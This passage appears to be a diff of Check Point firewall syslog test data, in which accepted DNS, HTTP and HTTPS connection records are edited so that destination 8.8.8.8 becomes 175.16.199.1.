FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"172.217.19.194"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"55770"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x1b,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"30"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45179"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x1b,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"30"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45179"; 
service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d916,0x1c,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"31"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33466"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10002"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x1d,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"32"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"172.217.20.66"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59890"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d916,0x1e,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; 
sequencenum:"33"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42261"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d916,0x1f,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"34"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"48788"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10003"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d916,0x20,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"35"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; 
rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41829"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d916,0x21,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"36"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36408"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10004"; xlatesrc:"0.0.0.0"] -<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x22,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"37"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60238"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; 
flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x23,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"38"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49507"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x24,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"39"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36205"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x25,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"40"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502486"; 
layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53772"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x22,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"37"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60238"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x23,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"38"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49507"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; 
flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x24,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"39"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36205"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x25,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"40"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502486"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53772"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d916,0x26,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"104.26.6.155"; inzone:"Internal"; layer_name:"Network"; 
layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58600"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36552"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39733"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; 
ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43005"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56632"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; 
layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45251"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52899"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42262"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; 
logid:"0"; loguid:"{0x5e80d917,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36552"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39733"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; 
layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43005"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56632"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d917,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={82AFE1F3-B461-4E47-895D-3AEC843AFBF7};mgmt=gw-da58d3;date=1585502469;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502487"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45251"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:21:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Internal"; flags:"4606212"; ifdir:"inbound"; 
